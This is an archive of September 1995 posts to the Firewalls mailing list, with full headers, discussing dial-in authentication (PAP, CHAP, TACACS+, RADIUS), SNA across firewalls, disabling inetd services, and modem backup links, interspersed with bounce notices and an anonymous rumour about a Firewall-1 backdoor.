firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm kind of new to this with firewalls so the question might be a bit strange, but suppose you have an AS400 behind a firewall that wants to talk to another on the outside. Are there any commercial firewalls that can talk SNA, or is there need for some sort of "converter" between TCP/IP and SNA. Any suggestions would be very grateful. Thanks /roberto From firewalls-owner Thu Sep 7 06:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15647 for firewalls-outgoing; Thu, 7 Sep 1995 06:31:16 -0700 Received: from uustar.starnet.net (uustar.starnet.net [199.217.253.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15640 for ; Thu, 7 Sep 1995 06:31:13 -0700 Received: from taft.UUCP by uustar.starnet.net with UUCP id AA13371 (5.67b/IDA-1.5 for greatcircle.com!firewalls); Thu, 7 Sep 1995 08:20:12 -0500 Received: (from nicholcs@localhost) by taft.AGEdwards.COM (8.6.9/8.6.9) id HAA13286; Thu, 7 Sep 1995 07:56:18 -0500 Date: Thu, 7 Sep 1995 07:46:36 -0500 (CDT) From: Chris S Nichols Subject: Cisco 2511s To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been sent a proposol from a vendor who wishes to allow remote access to a sent using a Cisco 2511 on the LAN. They want to allow a laptop using PPP dialin to a Cisco 2511 with a remote access port and use the PAP protocol which they claim will take care of security. They claim this can't be hacked.>:-() There proposal claims that a remote user dialing in with PPP would have to know the 2511 port IP address and then issues an authentication string via PAP(?) which provides security. My opinion is, no, you want remote access, you go through an authentication server and use a Security Dynamics card. What the heck is this PAP stuff and how much of a potential mess is this? TIA, Chris N From firewalls-owner Thu Sep 7 07:00:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15825 for firewalls-outgoing; Thu, 7 Sep 1995 06:42:50 -0700 Received: from mms (mms.mms-gmbh.de [193.103.159.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15818 for ; Thu, 7 Sep 1995 06:42:45 -0700 Message-Id: Comments: Authenticated sender is From: "Frank Heinzius" To: portmaster-users@livingston.com Date: Thu, 7 Sep 1995 15:43:15 +0000 Subject: Comparison RADIUS and TACACS+ Reply-to: frimp@mms-gmbh.de CC: firewalls@greatcircle.com Priority: normal X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all! Does anybody have a comparison between the features of RADIUS and TACACS+? A feature table comparison would be perfect. I have customers who want to buy a Cisco Access Server, I want to sell them Livingston PortMasters. Despite this, Cisco and Livingston announced that they would integrate each others features into their machines. Thanks in advance, Frank -- ***** The expressed opinions are totally mine! ***** Frank M. Heinzius MMS Communication GmbH frimp@mms-gmbh.de Eiffestrasse 598 Phone: +49 40 2111105-0 Fax: +49 40 210 32 210 From firewalls-owner Thu Sep 7 08:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17287 for firewalls-outgoing; Thu, 7 Sep 1995 08:22:16 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17280 for ; Thu, 7 Sep 1995 08:22:11 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id KAA03038 for ; Thu, 7 Sep 1995 10:20:09 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id BAA05618; Sat, 2 Sep 1995 01:43:47 -0500 From: Alan Hannan Message-Id: <199509020643.BAA05618@gaijin.mid.net> Subject: Re: how to close socket To: jmeritt@smtpinet.aspensys.com (Meritt Jim) Date: Sat, 2 Sep 1995 01:43:47 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9508018099.AA809996857@smtpinet.aspensys.com> from "Meritt, Jim" at Sep 1, 95 04:07:37 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 837 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Meritt, Jim is rumored to have said: --> On a standard sun box using /etc/services and inetd, how would you --> stop traffic from being passed through a port? Any of the following there will work. #1 is the most simple, and most likely the one you will choose. Good luck. 1) Stop the service from being spawned by inetd: A) Comment out the entry in /etc/inetd.conf for the service you want to disallow. B) Restart inetd. 2) Control Access for the service using TCP Wrappers A) Find tcp wrappers. B) Install it. 3) Modify the binary/proxy/service to filter/disallow connections based upon proprietary configurations. -- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 From firewalls-owner Thu Sep 7 09:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17686 for firewalls-outgoing; Thu, 7 Sep 1995 08:51:37 -0700 Received: from theory.tc.cornell.edu (THEORY.TC.CORNELL.EDU [132.236.98.174]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17672 for ; Thu, 7 Sep 1995 08:51:33 -0700 Received: (from uactech@localhost) by theory.tc.cornell.edu (8.6.9/8.6.6) id LAA81693 for firewalls@greatcircle.com; Thu, 7 Sep 1995 11:50:05 -0400 Received: from ovid by ithaca.actech.com (920330.SGI/SMI-4.0) id AA01678; Thu, 7 Sep 95 11:45:53 -0400 Received: by ovid.actech.com (5.x/SMI-SVR4) id AA07907; Thu, 7 Sep 1995 11:45:50 -0400 Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.ovid.sun4.51 via MS.5.6.ovid.sun4_51; Thu, 7 Sep 1995 11:45:49 -0400 (EDT) Message-Id: Date: Thu, 7 Sep 1995 11:45:49 -0400 (EDT) From: Steve Gaarder To: firewalls@greatcircle.com Subject: SLIP/PPP dialin on firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up Internet connections for our company's various offices using firewalls built from BSD/OS and the TIS firewall toolkit. I want to add a modem-based backup link so that the firewalls can communicate with each other if an Internet link goes down. To do this, I am thinking of installing a modem for SLIP or PPP on the firewall machine, and disabling any logins other than to the PPP/SLIP software. It seems to me that as long as I treat a SLIP/PPP connection the same as one from the Internet, I am not reducing security significantly. Am I missing anything? thanks, Steven Gaarder Network and Systems Administrator gaarder@actech.com A C Technology, Ithaca, N.Y., USA From firewalls-owner Thu Sep 7 09:03:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17612 for firewalls-outgoing; Thu, 7 Sep 1995 08:49:06 -0700 Received: from camelot.netmarket.com (camelot.netmarket.com [199.79.247.247]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17605 for ; Thu, 7 Sep 1995 08:49:03 -0700 Received: from tannis.netmarket.com (tannis.netmarket.com [172.16.1.10]) by camelot.netmarket.com (8.6.10/8.6.9) with ESMTP id LAA24386 for ; Thu, 7 Sep 1995 11:47:37 -0400 Received: from brigadoon.netmarket.com (brigadoon.netmarket.com [172.16.1.236]) by tannis.netmarket.com (8.6.10/8.6.10) with SMTP id LAA00594 for ; Thu, 7 Sep 1995 11:47:37 -0400 Received: by brigadoon.netmarket.com (5.x/client-1.5) id AA02642; Thu, 7 Sep 1995 11:47:35 -0400 Message-Id: <9509071547.AA02642@brigadoon.netmarket.com> From: hal@netmarket.com (Hal Pomeranz) Date: Thu, 7 Sep 1995 11:47:34 -0400 X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: firewalls@greatcircle.com Subject: Brent Chapman to appear at BBLISA 9/13 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk August: Firewalls Date: Sept 13, 1995 Time: 7:00-9:00pm Location: MIT Building E51 Room 85 (formerly Room 012) 70 Memorial Drive Cambridge, MA Speaker: Brent Chapman Coordinator: Hal Pomeranz Brent Chapman, manager of the "Firewalls" Internet mailing list and coauthor of the new book "Building Internet Firewalls" (O'Reilly & Associates; due out in mid-September) will be talking about current topics in building and managing Internet firewall security systems. --------------------------------------------------------------------- Want to find out more about BackBayLISA? the monthly meetings? the mailing lists? Send mail to Need directions to the meeting? ftp them from, ftp.bblisa.org:/pub/bblisa/directions --------------------------------------------------------------------- From firewalls-owner Thu Sep 7 09:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA19029 for firewalls-outgoing; Thu, 7 Sep 1995 09:29:54 -0700 Received: from stilton.cisco.com (stilton.cisco.com [171.69.1.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA19022 for ; Thu, 7 Sep 1995 09:29:51 -0700 Received: from cisco.com (localhost.cisco.com [127.0.0.1]) by stilton.cisco.com (8.6.8+c/8.6.5) with ESMTP id JAA01942; Thu, 7 Sep 1995 09:28:16 -0700 Message-Id: <199509071628.JAA01942@stilton.cisco.com> To: Chris S Nichols Cc: firewalls@GreatCircle.COM Subject: Re: Cisco 2511s In-Reply-To: Your message of "Thu, 07 Sep 1995 07:46:36 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Id: <1937.810491295.1@cisco.com> Date: Thu, 07 Sep 1995 09:28:16 -0700 From: David Carrel Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, PAP is just one of the protocols used by PPP to convey authentication information. PAP has the drawback that it sends cleartext passwords. But it has the benefit that you can combine it with token cards like the SDI products. You cannot get the SDI cards to work with CHAP. The bit about having to know the IP address is bogus. IPCP negotiation will convey both IP addresses to any dialin client that authenticates properly. Even if it didn't, don't ever base security on obscurity. If they're planning to use fixed passwords with PAP, you may want to consider using CHAP instead as it doesn't transmit a cleartext password. (CHAP is available on all cisco gear.) You can use XTACACS or TACACS+ (and very shortly kerberos and RADIUS) for communicating to a remote authentication server. Dave ---------------------------------------------------------------------------- David Carrel | E-mail: carrel@cisco.com Security Development, cisco Systems | phone: (408) 526-5207 210 W. Tasman Drive | fax: (408) 526-4952 San Jose, CA 95134-1706 | ---------------------------------------------------------------------------- > I have been sent a proposol from a vendor who wishes to allow remote > access to a sent using a Cisco 2511 on the LAN. > > They want to allow a laptop using PPP dialin to a Cisco 2511 with a remote > access port and use the PAP protocol which they claim will take care of > security. They claim this can't be hacked.>:-() > > There proposal claims that a remote user dialing in with PPP would have > to know the 2511 port IP address and then issues an authentication string > via PAP(?) which provides security. > > My opinion is, no, you want remote access, you go through an authentication > server and use a Security Dynamics card. > > What the heck is this PAP stuff and how much of a potential mess is this? > > TIA, > > Chris N > From firewalls-owner Thu Sep 7 10:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA19169 for firewalls-outgoing; Thu, 7 Sep 1995 09:36:20 -0700 Received: from condor.messaging.cs.mci.com ([166.37.39.95]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA19162 for ; Thu, 7 Sep 1995 09:36:15 -0700 Received: by condor.messaging.cs.mci.com; id AB29293; Thu, 7 Sep 1995 10:32:24 -0600 Date: Thu, 7 Sep 1995 10:32:24 -0600 From: Mail Delivery Subsystem Subject: Returned mail: Unable to deliver mail Message-Id: <9509071632.AB29293@condor.messaging.cs.mci.com> To: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Thu Sep 7 10:31:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA20252 for firewalls-outgoing; Thu, 7 Sep 1995 10:22:00 -0700 Received: from sunthing.sjsinc.com (sunthing.sjsinc.com [140.174.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA20237 for ; Thu, 7 Sep 1995 10:21:54 -0700 Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: KAA23295; Thu, 7 Sep 1995 10:19:46 -0700 Date: Thu, 7 Sep 1995 10:19:46 -0700 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) Message-Id: <199509071719.KAA23295@sjsinc.com> To: gaarder@actech.com Subject: Re: SLIP/PPP dialin on firewall? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steven Gaarder writes: > > I am setting up Internet connections for our company's various offices > using firewalls built from BSD/OS and the TIS firewall toolkit. I want > to add a modem-based backup link so that the firewalls can communicate > with each other if an Internet link goes down. To do this, I am > thinking of installing a modem for SLIP or PPP on the firewall machine, > and disabling any logins other than to the PPP/SLIP software. It seems > to me that as long as I treat a SLIP/PPP connection the same as one from > the Internet, I am not reducing security significantly. Am I missing > anything? > My only comments here would be to use the mgetty portion of mgetty+sendfax (ftp://sunsite.unc.edu) to control the port. It allows a degree of modem port control that is not usually available in that it can restrict access to certain logins, certain phone numbers (if your modems and telco support Caller-ID), will launch programs based on user ID's (which can be a script to verify that the Internet connection is down before accepting a call), and many other features. Just remember to launch it from your /etc/ttytab file with the data-only flag, and watch the log files -- they grow very fast... My $0.03 worth (inflation has upped the value of advice).... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 Fax: 415 989 7250 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- From firewalls-owner Thu Sep 7 11:15:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA20969 for firewalls-outgoing; Thu, 7 Sep 1995 10:58:07 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA20955 for ; Thu, 7 Sep 1995 10:57:57 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA14895; Thu, 7 Sep 95 13:16:28 CDT Received: by mnbp.network.com with Microsoft Mail id <304F3195@mnbp.network.com>; Thu, 07 Sep 95 12:53:25 CDT From: Craig McLellan To: firewalls Subject: Looking for firm information Date: Thu, 07 Sep 95 12:52:00 CDT Message-Id: <304F3195@mnbp.network.com> Encoding: 8 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone on this list heard of the consulting firm Peter Davis and associates. Apparently they are present themselves as one of the leading security consulting firms in North America. Any feedback? RGRDS....clm From firewalls-owner Thu Sep 7 12:00:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA21926 for firewalls-outgoing; Thu, 7 Sep 1995 11:26:03 -0700 Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA21917 for ; Thu, 7 Sep 1995 11:25:56 -0700 Received: (from jerry@localhost) by freeside.fc.net (8.6.12/8.6.6) id NAA07276; Thu, 7 Sep 1995 13:22:58 -0500 From: Jeremy Porter Message-Id: <199509071822.NAA07276@freeside.fc.net> Subject: Re: Comparison RADIUS and TACACS+ To: frimp@mms.mms-gmbh.de Date: Thu, 7 Sep 1995 13:22:57 -0500 (CDT) Cc: portmaster-users@livingston.com, firewalls@greatcircle.com In-Reply-To: from "Frank Heinzius" at Sep 7, 95 03:43:15 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1107 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Hi all! > >Does anybody have a comparison between the features of RADIUS and >TACACS+? A feature table comparison would be perfect. > >I have customers who want to buy a Cisco Access Server, I want to >sell them Livingston PortMasters. Despite this, Cisco and Livingston >announced that they would integrate each others features into their >machines. Why not wait until you can buy a product that does both radius and TACACS+? I understand there are people working on such things, in additions to Cisco's announced support for RADIUS. Supposedly all the free TACACS servers suck. I've never been forced to use one, because Cisco Access servers have such a tiny port density. (Although Cisco's will support OSPF and classless operation which Livingston's don't.) -- ------ Freeside Communciations, Inc. Texas's ISDN leader. ------ --- (512)-339-6094 P.O. Box 530264 Austin, TX 78753 --- ------ (sales: sales@fc.net, pricing: info@fc.net) ------ --------- jerry@fc.net ---------------------------------------- ------------ High Speed, Fault-tolerant Networking -------------- From firewalls-owner Thu Sep 7 12:10:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA22592 for firewalls-outgoing; Thu, 7 Sep 1995 11:46:47 -0700 Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA22585 for ; Thu, 7 Sep 1995 11:46:44 -0700 Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA25370; Thu, 7 Sep 1995 13:45:16 -0500 Date: Thu, 7 Sep 1995 13:45:16 -0500 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9509071845.AA25370@hosaka.smallworks.com> To: firewalls@GreatCircle.COM, taft!nicholcs@uustar.starnet.net Subject: Re: Cisco 2511s Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PAP (Password Authentication Protocol) is described in RFC1334, along with CHAP (Challenge Handshake Authentication Protocol). PAP is not a strong authentication method, CHAP is somewhat better. You can even use Security Dynamics cards via xtacacs and TACACS+, both of which the Cisco can 'speak' with great fluency. Jim From firewalls-owner Thu Sep 7 12:32:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA23935 for firewalls-outgoing; Thu, 7 Sep 1995 12:22:21 -0700 Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA23928 for ; Thu, 7 Sep 1995 12:22:10 -0700 From: Chris Tyler To: Firewalls@GreatCircle.COM Date: Thu, 7 Sep 1995 15:20 EDT Subject: Re: SNA through firewalls? Content-Length: 705 Content-Type: text/plain Message-ID: <304f46160.257e@devel.dejong.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm kind of new to this with firewalls so the question might be a bit > strange, but suppose you have an AS400 behind a firewall that wants to > talk to another on the outside. Are there any commercial firewalls that > can talk SNA, or is there need for some sort of "converter" between > TCP/IP and SNA. Any suggestions would be very grateful. AS400's can directly speak TCP/IP now, and that's the approach that you'll probably want to use. Any good TCP/IP firewalling solution will work in that environment (although I don't know about proxying TN5250 :-). Chris Tyler chris@dejong.com Systems Development Manager, Wm. De Jong Enterprises Inc. +1-519-424-9007 / fax +1-519-424-2399 From firewalls-owner Thu Sep 7 15:00:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27719 for firewalls-outgoing; Thu, 7 Sep 1995 14:41:43 -0700 Received: from utopia.hacktic.nl (utopia.hacktic.nl [194.109.9.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA27705 for ; Thu, 7 Sep 1995 14:41:39 -0700 Received: (from replay@localhost) by utopia.hacktic.nl (8.6.12/8.6.12) id XAA16451 for firewalls@greatcircle.com; Thu, 7 Sep 1995 23:40:07 +0200 Date: Thu, 7 Sep 1995 23:40:07 +0200 Message-Id: <199509072140.XAA16451@utopia.hacktic.nl> Subject: Firewall-1 concerns To: firewalls@greatcircle.com From: nobody@REPLAY.COM (Anonymous) Organization: RePLaY aND CoMPaNY UnLimited XComm: Replay may or may not approve of the content of this posting XComm: Report misuse of this automated service to Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recently found out that the Firewall-1 product from Sun is actually written and developed by a company in Israel and that Sun does not have nor has access to the source code. I'm afraid that companies may look at the Sun firewall-1 product and think that Sun has inspected the code for trapdoor and such in the code that may have put there under orders from the Masad. In fact, I heard one person say that in looking at the binary there is very suspicious code. It turns out that Sun does not have the source and hasn't inspected it. hope that the US military and other sensitive agencies or companies with sensitive information aren't using this product for protection. It may be that the Masad has free reign to get into you network! Someone very concerned From firewalls-owner Thu Sep 7 15:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA28287 for firewalls-outgoing; Thu, 7 Sep 1995 15:10:00 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA28280 for ; Thu, 7 Sep 1995 15:09:57 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Thu, 07 Sep 1995 19:20:01 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;979:950907192001] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #516 Message-Id: <979*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509071531.IAA17353*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Thu Sep 7 16:32:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA29406 for firewalls-outgoing; Thu, 7 Sep 1995 16:03:07 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA29399 for ; Thu, 7 Sep 1995 16:03:01 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id gc19077; 7 Sep 95 19:00 EDT Received: by ncrgw1.ATTGIS.COM; 4 Sep 95 03:10:09 EDT Received: by ncrhub4.ATTGIS.COM; 4 Sep 95 03:09:37 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 4 Sep 95 03:05:24 EDT Subject: MMUG mail warning Date: Mon, 4 Sep 95 03:10:00 EDT Message-ID: <9509071900.gc19077@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 3 Sep 95 01:48:58 EDT Received: by ncrhub4.ATTGIS.COM; 3 Sep 95 01:35:21 EDT Received: by ncrgw1.ATTGIS.COM; 3 Sep 95 01:35:11 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfnx19337; Sun, 3 Sep 1995 01:15:40 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA24562 for firewalls-digest-outgoing; Sat, 2 Sep 1995 22:01:01 -0700 Date: Sat, 2 Sep 1995 22:01:01 -0700 Message-Id: <199509030501.WAA24562@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #513 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Saturday, 2 September 1995 Volume 04 : Number 513 In this issue: snprintf.c and SunOS 5.4 re: snprintf(), SMURF, & Jules Own Version... re: snprintf(), SMURF, & Jules Own Version... Subject: Re: using suns/sunos for gateway host(s) Re: FW: Programming Re: FW: Programming Re: Use of Remote Authentication: tacacs/radius/etc... Re: DNS forwarding problem Large-Mixed-OS FW access problem Re: HannaH from SecureWare Inc. RADIUS... Where is it? Large-Mixed-OS FW access problem Frame-Relay Net Connections See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: "Kenneth Kron" Date: 1 Sep 1995 19:24:39 -0800 Subject: snprintf.c and SunOS 5.4 Patrick, Thanks for the snprintf source, FYI -- In order to compile your snprintf on SunOS 5.4 I had to From firewalls-owner Thu Sep 7 17:13:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA00680 for firewalls-outgoing; Thu, 7 Sep 1995 16:34:00 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA00673 for ; Thu, 7 Sep 1995 16:33:56 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id bn20545; 7 Sep 95 19:31 EDT Received: by ncrgw1.ATTGIS.COM; 5 Sep 95 03:04:29 EDT Received: by ncrhub4.ATTGIS.COM; 5 Sep 95 03:03:00 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 5 Sep 95 02:59:27 EDT Subject: MMUG mail warning Date: Tue, 5 Sep 95 03:04:00 EDT Message-ID: <9509071931.bn20545@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 23:09:56 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 22:55:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 22:55:12 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfju15345; Fri, 1 Sep 1995 22:31:37 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29960 for firewalls-digest-outgoing; Fri, 1 Sep 1995 19:03:40 -0700 Date: Fri, 1 Sep 1995 19:03:40 -0700 Message-Id: <199509020203.TAA29960@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #512 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 512 In this issue: Re: Security Paradigms (was HannaH) Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Use of Remote Authentication: tacacs/radius/etc... Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Placement of WWW Server - any thoughts? Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. how to close socket Re: HannaH from SecureWare Inc. Re: DNS forwarding problem linux vs. *bsd for secure networking system Re: DNS forwarding problem snprintf() See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary@habanero.jmu.edu Date: Fri, 1 Sep 95 14:08:10 -0400 Subject: Re: Security Paradigms (was HannaH) > These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD > TO TRAIN THEM. We do not have the resources, or the time, or the "lost From firewalls-owner Thu Sep 7 18:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03068 for firewalls-outgoing; Thu, 7 Sep 1995 17:51:48 -0700 Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA03061 for ; Thu, 7 Sep 1995 17:51:44 -0700 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id KAA15506 (8.6.12/IDA-1.6); Fri, 8 Sep 1995 10:50:12 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id KAA16123; Fri, 8 Sep 1995 10:50:07 +1000 From: Julian Assange Message-Id: <199509080050.KAA16123@suburbia.net> Subject: Re: Firewall-1 concerns To: nobody@REPLAY.COM (Anonymous) Date: Fri, 8 Sep 1995 10:50:05 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> from "Anonymous" at Sep 7, 95 11:40:07 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 769 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [...] > It turns out that Sun does not have the source and hasn't inspected it. > hope that the US military and other sensitive agencies or companies > with sensitive information aren't using this product for protection. > > It may be that the Masad has free reign to get into you network! > > Someone very concerned Back door? I PROMIS you there is no back door. -- +----------------------------------+-----------------------------------------+ | Julian Assange | "if you think the United States has | | | has stood still, who built the largest | | proff@suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From firewalls-owner Thu Sep 7 19:32:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA04241 for firewalls-outgoing; Thu, 7 Sep 1995 19:15:12 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with 